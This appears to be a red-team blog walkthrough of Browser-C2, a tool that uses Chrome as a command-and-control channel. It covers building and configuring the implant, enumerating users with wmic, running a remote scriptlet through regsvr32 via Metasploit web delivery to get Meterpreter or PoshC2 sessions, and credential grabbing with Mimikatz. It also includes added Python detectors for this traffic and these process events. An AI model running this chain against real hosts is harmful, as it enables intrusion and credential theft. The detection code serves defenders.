Red teams are always looking for innovative ways to establish connections back to their infrastructure. The main reasons that lead red teams to use standard protocols or native system functionality for command and control operations are to bypass restrictions imposed on the host and to stay off the radar of the blue team. 0x09AL developed Browser-C2 in Go, which uses the browser (Chrome) as a communication channel and can bypass host-based firewalls. 0x09AL described the idea and the operation of the tool in his blog.

The tool depends on the following two Go packages, which must be installed before it can be built.

go get -u github.com/gorilla/mux
go get -u github.com/chzyer/readline

The implant can be compiled to an executable with the following command. However, prior to that the agent.go file needs to be changed to contain the IP address of the C2 server.

go build agent.go

Browser C2 – Converting the implant to executable

The jquery file needs to be modified to contain the IP of the command and control server in the var url parameter.

Browser C2 – jquery Configuration

The main command and control application can be compiled with the following:

go build

When the implant is executed on the target host, the Chrome browser will start and automatically reach the command and control server endpoint.


Browser C2 – Agent Execution

A connection will be established with the C2 server, and commands can be executed to retrieve host information.
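The channel just described is ordinary HTTP from a browser to a hard-coded server address, which is also what makes it visible on the wire. The following added example (not code from Browser-C2 or any vendor product) shows how a defender can triage proxy or HTTP logs for that shape of traffic: a browser user-agent talking plaintext HTTP to a raw IP address on a non-standard port, and request series whose inter-arrival times are nearly constant. The log format, the sample records, the placeholder server 192.0.2.10 and the thresholds are all constructed for the example.

```python
"""Network-side triage of plaintext HTTP logs for browser-based C2.

Added example for this post, not part of Browser-C2 or any vendor tool.
It assumes a simplified proxy/HTTP log format (constructed here):
    <epoch_ts> <src_ip> <dst_host> <dst_port> <method> <uri> "<user_agent>"
Raw-IP destinations, plain HTTP on a non-standard port and metronomic
polling are the weak signals a browser-to-C2 channel leaves behind.
"""
import ipaddress
import shlex
import statistics
from collections import defaultdict

# Constructed sample log: workstation 10.0.0.5 polls 192.0.2.10:8080 every
# 5 seconds from Chrome, mixed with ordinary browsing to a named host.
SAMPLE_LOG = """\
1700000000 10.0.0.5 192.0.2.10 8080 GET /get "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000001 10.0.0.5 www.example.com 80 GET /index.html "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000005 10.0.0.5 192.0.2.10 8080 GET /get "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000010 10.0.0.5 192.0.2.10 8080 GET /get "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000015 10.0.0.5 192.0.2.10 8080 GET /get "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000017 10.0.0.7 www.example.com 80 GET /news "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000020 10.0.0.5 192.0.2.10 8080 GET /get "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
1700000031 10.0.0.7 www.example.com 80 GET /news "Mozilla/5.0 (Windows NT 10.0) Chrome/118.0"
"""


def parse_line(line):
    """Split one log record; shlex keeps the quoted user-agent as one field."""
    ts, src, host, port, method, uri, ua = shlex.split(line)
    return {"ts": int(ts), "src": src, "host": host, "port": int(port),
            "method": method, "uri": uri, "ua": ua}


def is_raw_ip(host):
    """True when the HTTP host is a bare IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_beacons(events, min_requests=4, max_cv=0.2):
    """Group requests by (src, host, port, uri) and flag series whose gaps
    between requests are almost constant (low coefficient of variation)."""
    series = defaultdict(list)
    for e in events:
        series[(e["src"], e["host"], e["port"], e["uri"])].append(e["ts"])
    findings = []
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({"key": key, "count": len(stamps),
                             "period_s": mean, "cv": round(cv, 3)})
    return findings


def triage(log_text):
    """Return (rule, details) alerts for the two signals described above."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    alerts = []
    # Signal 1: a browser user-agent sending plain HTTP to a raw IP on a
    # non-standard port. Each (src, host, port) is reported once.
    seen = set()
    for e in events:
        key = (e["src"], e["host"], e["port"])
        if key in seen:
            continue
        if is_raw_ip(e["host"]) and e["port"] not in (80, 443) and "Chrome" in e["ua"]:
            seen.add(key)
            alerts.append(("plaintext_raw_ip_c2_candidate", key))
    # Signal 2: metronomic polling of the same URI.
    for b in find_beacons(events):
        alerts.append(("regular_beacon", b["key"], b["period_s"]))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Neither signal is conclusive on its own (update checks also poll on fixed intervals, and some internal services are reached by IP), so the intended use is to feed both into a correlation rule together with the endpoint process lineage of the browser.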


Browser C2 – Command Execution

The Windows Management Instrumentation command-line utility (WMIC) can also be used for additional host reconnaissance.

wmic useraccount list full

Browser C2 – User Enumeration via WMIC

Browser-C2 doesn’t support encryption for communication between the server and the compromised host, and it has limited functionality, since it cannot execute PowerShell scripts and can only be used for basic command execution. For additional operations an alternative channel such as Meterpreter or PoshC2 can be considered. The Metasploit Framework web delivery module will generate and host a scriptlet automatically.

exploit/multi/script/web_delivery

Browser C2 – Metasploit Web Delivery Module

regsvr32 is a common method discovered by Casey Smith which bypasses AppLocker policies, and it is a reliable technique to execute arbitrary code remotely. The scriptlet can be executed from an existing Browser-C2 agent session.
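Each step the post has walked through so far leaves a process-creation record on the host: the implant launching Chrome towards the C2 address, wmic enumerating user accounts, and regsvr32 being handed a remote scriptlet. The following added example (not code from Browser-C2, Metasploit or PoshC2) encodes those three observations as rules over Sysmon-like process events. The event shape, the sample events, the expected-parent allowlist for Chrome, the URL regex and the placeholder address 192.0.2.10 are assumptions made for the example.

```python
"""Endpoint process-creation triage for the behaviours this post walks through.

Added example, not code from Browser-C2, Metasploit or PoshC2. It works on a
constructed, Sysmon-like event shape (image, parent image, command line)
and encodes three rules a defender can take from the post:
  R1  Chrome started by something other than the shell or Chrome itself,
      with a raw-IP URL on its command line (the implant opening the channel)
  R2  wmic.exe enumerating user accounts
  R3  regsvr32.exe given a remote URL (scriptlet fetched over the network)
The parent allowlist and the URL regex are assumptions, not from the post.
"""
import re
from ipaddress import ip_address

URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)
# Parents from which a user-driven Chrome launch is expected (assumption).
EXPECTED_CHROME_PARENTS = {"explorer.exe", "chrome.exe", "userinit.exe"}

# Constructed events; 192.0.2.10 is a documentation-range placeholder IP.
SAMPLE_EVENTS = [
    {"pid": 4101, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 4188, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": '"chrome.exe" https://www.example.com/'},
    {"pid": 5120, "image": r"C:\Users\alice\Downloads\agent.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "agent.exe"},
    {"pid": 5133, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Users\alice\Downloads\agent.exe",
     "cmdline": '"chrome.exe" http://192.0.2.10:8080/'},
    {"pid": 5210, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "wmic useraccount list full"},
    {"pid": 5302, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://192.0.2.10:8080/x.sct scrobj.dll"},
    {"pid": 5310, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def raw_ip_urls(cmdline):
    """Hosts of URLs in the command line that are bare IP addresses."""
    hosts = []
    for m in URL_RE.finditer(cmdline):
        host = m.group(1)
        try:
            ip_address(host)
            hosts.append(host)
        except ValueError:
            pass
    return hosts


def evaluate(event):
    """Return the list of rule names a single process-creation event trips."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    hits = []
    if image == "chrome.exe" and parent not in EXPECTED_CHROME_PARENTS and raw_ip_urls(cmd):
        hits.append("R1_chrome_launched_by_nonshell_to_raw_ip")
    if image == "wmic.exe" and "useraccount" in cmd.lower():
        hits.append("R2_wmic_user_enumeration")
    if image == "regsvr32.exe" and URL_RE.search(cmd):
        hits.append("R3_regsvr32_remote_scriptlet")
    return hits


def triage(events):
    """(pid, rule) pairs for every event that trips at least one rule."""
    return [(e["pid"], rule) for e in events for rule in evaluate(e)]


if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(pid, rule)
```

R1 is the rule specific to this tool's design: a legitimate Chrome window is almost always a child of explorer.exe or of another Chrome process, so a browser spawned by an unsigned binary in a user profile directory with an IP-literal URL is a strong lead even before the network data is consulted. R2 and R3 are generic living-off-the-land rules; the regsvr32 one should be tuned on the presence of a URL, not on the flag order, since the flags can be permuted freely.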


Browser C2 – Code Execution via regsvr32 Metasploit

When the payload is delivered, a Meterpreter session will open which provides enhanced capabilities.


Browser C2 – Meterpreter via Web Delivery

The same method can also be used to establish a connection with PoshC2 for PowerShell-based post-exploitation activities.


Browser C2 – Code Execution via regsvr32 for PoshC2

The implant handler of PoshC2 will receive the connection.


PoshC2 – Implant Handler

Interaction with the implant starts by selecting the associated ID. PoshC2 contains various PowerShell modules which can be used for extensive host reconnaissance and credential grabbing, such as Mimikatz.


Browser C2 – Mimikatz via Implant Handler

Mimikatz output will appear in the PoshC2 console.


Browser C2 – Mimikatz PoshC2
